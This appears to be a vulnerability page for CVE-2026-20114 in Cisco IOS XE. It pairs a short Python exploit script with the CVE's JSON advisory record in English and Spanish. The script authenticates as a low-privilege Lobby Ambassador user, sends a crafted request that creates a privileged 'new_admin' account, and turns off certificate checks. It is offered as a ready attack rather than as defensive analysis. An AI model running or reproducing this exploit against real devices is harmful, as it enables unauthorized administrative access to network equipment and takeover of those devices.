CVE-2026-20114

import requests # Target URL (Placeholder) target_url = "https://<target-ip>/webui/api/lobby/create_user" # Attacker credentials (Lobby Ambassador user) username = "lobby_user" password = "lobby_password" # Payload to create a privileged user payload = { "username": "new_admin", "password": "Admin123!", "privilege_level": 1 # Elevating privilege } # Session to handle cookies session = requests.Session() # 1. Authenticate as Lobby Ambassador login_data = {"username": username, "password": password} session.post(f"https://<target-ip>/webui/login", data=login_data, verify=False) # 2. Send crafted request to exploit the vulnerability response = session.post(target_url, json=payload, verify=False) if response.status_code == 200: print("[+] Exploit successful! User created.") else: print("[-] Exploit failed.")

{"cve": {"id": "CVE-2026-20114", "sourceIdentifier": "[email protected]", "published": "2026-03-25T16:16:16.117", "lastModified": "2026-03-26T15:13:15.790", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the Lobby Ambassador web-based management API of Cisco IOS XE Software could allow an authenticated, remote attacker to elevate their privileges and access management APIs that would not normally be available for Lobby Ambassador users. \r\n\r This vulnerability exists because parameters that are received by an API endpoint are not sufficiently validated. An attacker could exploit this vulnerability by authenticating as a Lobby Ambassador user and sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to create a new user with privilege level 1 access to the web-based management API. The attacker would then be able to access the device with these new credentials and privileges."}, {"lang": "es", "value": "Una vulnerabilidad en la API de gestión basada en web de Lobby Ambassador de Cisco IOS XE Software podría permitir a un atacante remoto autenticado elevar sus privilegios y acceder a APIs de gestión que normalmente no estarían disponibles para usuarios de Lobby Ambassador. Esta vulnerabilidad existe porque los parámetros que son recibidos por un endpoint de API no son validados suficientemente. Un atacante podría explotar esta vulnerabilidad autenticándose como un usuario de Lobby Ambassador y enviando una solicitud HTTP manipulada a un dispositivo afectado. Un exploit exitoso podría permitir al atacante crear un nuevo usuario con acceso de nivel de privilegio 1 a la API de gestión basada en web. El atacante podría entonces acceder al dispositivo con estas nuevas credenciales y privilegios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1286"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-lobby-privesc-KwxBqJy", "source": "[email protected]"}]}}